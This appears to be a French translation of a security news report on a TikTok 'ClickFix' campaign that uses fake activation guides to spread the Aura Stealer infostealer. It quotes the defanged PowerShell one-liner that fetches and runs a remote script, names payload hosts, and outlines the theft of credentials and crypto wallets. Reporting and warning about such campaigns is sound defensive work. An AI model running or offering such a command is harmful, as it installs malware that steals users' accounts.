Les cybercriminels utilisent des vidéos TikTok déguisées en guides d’activation gratuits pour des logiciels populaires tels que Windows, Spotify et Netflix pour diffuser des logiciels malveillants voleurs d’informations.
Xavier Mertens, gestionnaire d’ISC, a repéré la campagne en cours, qui est en grande partie la même que celle observée par Trend Micro en mai
Les vidéos TikTok vues par Breachtrace prétendent offrir des instructions sur la façon d’activer des produits légitimes comme Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro et Discord Nitro, ainsi que des services inventés tels que Netflix et Spotify Premium.
Les vidéos effectuent une attaque ClickFix, qui est une technique d’ingénierie sociale qui fournit ce qui semble être des « correctifs » légitimes ou des instructions qui incitent les utilisateurs à exécuter des commandes PowerShell malveillantes ou d’autres scripts qui infectent leurs ordinateurs avec des logiciels malveillants.
Chaque vidéo affiche une courte commande d’une ligne et indique aux téléspectateurs de l’exécuter en tant qu’administrateur dans PowerShell:
iex (irm slmgr[.]win/photoshop)Il convient de noter que le nom du programme dans l’URL est différent selon le programme qui est usurpé. Par exemple, dans les fausses vidéos d’activation de Windows, au lieu de l’URL contenant photoshop, il inclurait Windows.
Dans cette campagne, lorsque la commande est exécutée, PowerShell se connecte au site distant slmgr[.] win pour récupérer et exécuter un autre script PowerShell.
Ce script télécharge deux exécutables à partir des pages Cloudflare, le premier exécutable étant téléchargé à partir de https://file-epq [.] pages[.] développeur / mise à jour.exe [VirusTotal]. Cet exécutable est une variante du malware de vol d’informations Aura Stealer.
Aura Stealer collecte les informations d’identification enregistrées à partir des navigateurs, des cookies d’authentification, des portefeuilles de crypto-monnaie et des informations d’identification d’autres applications et les télécharge sur les attaquants, leur donnant accès à vos comptes.
Mertens dit qu’une charge utile supplémentaire sera téléchargée, nommée source.exe [VirusTotal], qui est utilisé pour auto-compiler du code à l’aide du compilateur Visual C# intégré de. NET (csc.exe). Ce code est ensuite injecté et lancé en mémoire.
Le but de la charge utile supplémentaire reste incertain.
Les utilisateurs qui effectuent ces étapes doivent considérer que toutes leurs informations d’identification sont compromises et réinitialiser immédiatement leurs mots de passe sur tous les sites qu’ils visitent.
Les attaques ClickFix sont devenues très populaires au cours de l’année écoulée, utilisées pour distribuer diverses souches de logiciels malveillants dans des campagnes de ransomware et de vol de crypto-monnaie.
En règle générale, les utilisateurs ne doivent jamais copier du texte à partir d’un site Web et l’exécuter dans une boîte de dialogue du système d’exploitation, y compris dans la barre d’adresse de l’Explorateur de fichiers, l’invite de commande, les invites PowerShell, le terminal macOS et les shells Linux.